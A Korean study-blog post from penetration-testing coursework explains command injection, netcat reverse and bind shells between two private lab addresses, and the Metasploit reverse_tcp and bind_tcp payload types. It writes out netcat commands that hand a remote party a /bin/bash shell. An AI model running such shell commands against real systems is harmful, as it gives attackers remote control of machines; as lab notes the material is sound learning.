Notice
Recent Posts
Recent Comments
Link
250x250
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- android
- tabbar
- Compose
- 안드로이드
- 앱
- textfield
- data
- activity
- binding
- intent
- textview
- livedata
- ScrollView
- Coroutines
- TEST
- 앱바
- 계측
- Navigation
- scroll
- 테스트
- drift
- DART
- viewmodel
- CustomScrollView
- Button
- appbar
- Kotlin
- LifeCycle
- Dialog
- Flutter
Archives
- Today
- Total
Study Record
[모의해킹 MSF] payload 본문
728x90
Command Injection : 코드를 주입해서 원하는 동작을 실행할 수 있다.
nc CMD
listener (192.168.10.50) ← server (192.168.10.134)
# nc -l -p 7979 # nc 192.168.10.50 7979 -e /bin/bash
→ listener 쪽에서 server 쪽의 명령어를 입력할 수 있다. server 쪽에서 명령어를 보내도 listener에서는 반응을 하지 않는다.
listener (192.168.10.50) ← server (192.168.10.134)
# nc -l -p 7979 -e /bin/bash # nc 192.168.10.50 7979
→ server 쪽에서 listener 쪽의 명령어를 입력할 수 있다. listener 쪽에서 명령어를 보내도 server에서는 반응을 하지 않는다.
reverse_tcp
: 피해 시스템에서 공격자한테 연결을 시도한다
bind_tcp
: 피해 시스템에서 listener 역할을 하고 공격자가 연결을 시도한다.
728x90
'모의해킹' 카테고리의 다른 글
| [모의해킹 실습] Tomcat 취약점 (0) | 2021.11.10 |
|---|---|
| [모의해킹 시스템 취약점] Samba(CVE 2007-2477, 공유 설정 ) (0) | 2021.11.09 |
| [모의해킹 시스템 취약점] NFS 전체 공유/vsftpd 백도어 (0) | 2021.11.08 |
| [모의해킹 시스템 취약점] r-service (0) | 2021.11.08 |
| [모의 해킹] exploit-db (searchsploit CMD) (0) | 2021.11.08 |
'모의해킹' Related Articles
more
